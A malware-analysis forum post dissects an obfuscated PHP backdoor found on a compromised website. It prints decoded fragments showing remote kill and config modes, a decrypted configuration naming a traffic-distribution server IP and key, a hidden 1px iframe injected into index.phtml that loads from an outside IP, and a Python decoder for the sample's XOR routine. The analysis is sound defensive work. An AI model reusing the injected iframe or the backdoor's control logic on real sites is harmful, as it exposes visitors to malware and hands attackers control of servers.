A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #19559  by Xylitol
 Wed Jun 05, 2013 8:32 pm
If someone has any info?
Obfuscated PHP file found on hxxp://www.dboulaisdance.ca

Some junk decoded:
Code:
 $c["url"]=$_POST["ptds"];
 $c["ip"]=$_POST["ptdsip"];
 $c["lin"]=$_POST["pto"];
 $c["id"]=$_POST["pesdid"];
 $c["key"]=$_POST["pkey"];

if($mode== "kill"AND $c["key"]==$_REQUEST["key"]){
 chmod("777",$_SERVER["SCRIPT_FILENAME"]);
 if(unlink($_SERVER["SCRIPT_FILENAME"]))
  die("ok\n");

}
a:5:{s:3:"url";s:34:"http://37.9.50.222/olods/stats.php";s:2:"ip";s:11:"37.9.50.222";s:3:"lin";s:17:"http://localhost/";s:2:"id";s:5:"50516";s:3:"key";s:24:"xNJqaDj9PdpFsIqzVpayMWjj";}

if($mode== "config"AND $c["key"]==$_REQUEST["key"]){
echo "<form name=\"form1\" method=\"post\" action=?mode=setconfig&key= ".$_REQUEST["key"] ."><pre>
TDS:     <input type=\"text\" name=\"ptds\" value=" .$c["url"] .">  TDS IP:  <input type=\"text\" name=\"ptdsip\" value=" .$c[ip] .">
KEY:     <input type=\"text\" name=\"pkey\" value=" .$c["key"] .">  Reserve: <input type=\"text\" name=\"pto\" value=" .$c[lin] .">
ID:      <input type=\"text\" name=\"pesdid\" value=" .$c["id"] .">  <input type=\"submit\" name=\"Submit\" value=\"ok\"></pre>
</form>

HTTP/1.0\r\n
Host: \r\n
Connection: Close\r\n\r\n\r\n
dodo lin200lin://httpHTTP/1.1 302 FoundLocation: cook&=echo'
Function used for the decode:
Code:
function string_cpt($String, $Password)
{
    $Salt   = "mpf";          // hard-coded salt
    $StrLen = strlen($String);
    $Seq    = $Password;      // first round is seeded with the password
    $Gamma  = '';
    // Build a keystream at least as long as the input: each round hashes
    // gamma . seq . salt with SHA-1 and appends 8 raw digest bytes.
    while (strlen($Gamma) < $StrLen) {
        $Seq    = pack("H*", sha1($Gamma . $Seq . $Salt));
        $Gamma .= substr($Seq, 0, 8);
    }
    // String XOR; PHP truncates the result to the shorter operand
    return $String ^ $Gamma;
}
$cfg = "dKlpckfl7VVL601EleY912xvcbYNxtsQPf5EI7bu3p9cGNdqghtSpoqN3Igxh2uNqCdF36kw9eyaXDtevkXF6BR2lxW9NGaGJaF0JDqwdiul/I$

echo "config : \n\n";
echo string_cpt(base64_decode($cfg),"WQ2bTZ8gt");
This is also an infected file, 'index.phtml', on the server:
Code:
    ukh.src = 'http://140.174.114.199/clk.php';
    ukh.style.position = 'absolute';
    ukh.style.border = '0';
    ukh.style.height = '1px';
    ukh.style.width = '1px';
    ukh.style.left = '1px';
    ukh.style.top = '1px';
Edit: Kahu Security made me a clean decoded version, thanks Daryl (it's attached).
Attachments: infected (7.04 KiB), infected (3.34 KiB), infected (3.89 KiB)
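A Python re-implementation of the string_cpt() keystream and of the base64 + XOR config decode shown above, added here as an example and not part of the original post or of the malware. The config string, the password "example-pw" and the "tds.invalid" host are constructed placeholders, since the real $cfg line on the page is truncated; php_string_fields() assumes all entries of the serialize()d array are strings, as in the decoded sample.

```python
import base64
import hashlib
import re

SALT = b"mpf"  # the hard-coded salt from the sample's string_cpt()

def keystream(password: bytes, length: int) -> bytes:
    """Rebuild string_cpt()'s 'gamma': every round SHA-1s gamma . seq . salt
    and appends 8 raw digest bytes until the stream covers the input."""
    seq, gamma = password, b""
    while len(gamma) < length:
        seq = hashlib.sha1(gamma + seq + SALT).digest()
        gamma += seq[:8]
    return gamma

def string_cpt(data: bytes, password: bytes) -> bytes:
    """XOR data with the keystream. PHP's string ^ truncates to the shorter
    operand; zip() does the same, so the output has the input's length."""
    return bytes(a ^ b for a, b in zip(data, keystream(password, len(data))))

def decode_config(cfg_b64: str, password: str) -> bytes:
    """Same pipeline as the forum snippet: base64_decode, then string_cpt."""
    return string_cpt(base64.b64decode(cfg_b64), password.encode())

def php_string_fields(serialized: bytes) -> dict:
    """Pull key/value pairs out of a PHP serialize()d array whose entries are
    all strings (as in the decoded config). The declared byte length is
    honoured, so quotes or 's:N:"' inside a value cannot derail the parse."""
    pat, items, pos = re.compile(rb's:(\d+):"'), [], 0
    while (m := pat.search(serialized, pos)) is not None:
        start, n = m.end(), int(m.group(1))
        items.append(serialized[start:start + n])
        pos = start + n + 2  # step over the closing quote and ';'
    return dict(zip(items[0::2], items[1::2]))

# Constructed sample (not from the infected file): same layout as the decoded
# config above, placeholder values, made-up password. XOR is symmetric, so
# string_cpt() both produces the ciphertext here and undoes it below.
SAMPLE_PASSWORD = "example-pw"
SAMPLE_PLAIN = (b'a:2:{s:3:"url";s:28:"http://tds.invalid/stats.php";'
                b's:3:"key";s:10:"ABCDEFGHIJ";}')
SAMPLE_CFG = base64.b64encode(
    string_cpt(SAMPLE_PLAIN, SAMPLE_PASSWORD.encode())).decode()

if __name__ == "__main__":
    for key, value in php_string_fields(
            decode_config(SAMPLE_CFG, SAMPLE_PASSWORD)).items():
        print(key.decode(), "=", value.decode())
```

To use it on a real sample, paste the full base64 $cfg and the password from the dropper into decode_config(); a wrong password yields garbage rather than an error, so check that the result starts with the PHP serialize() prefix a:N:{.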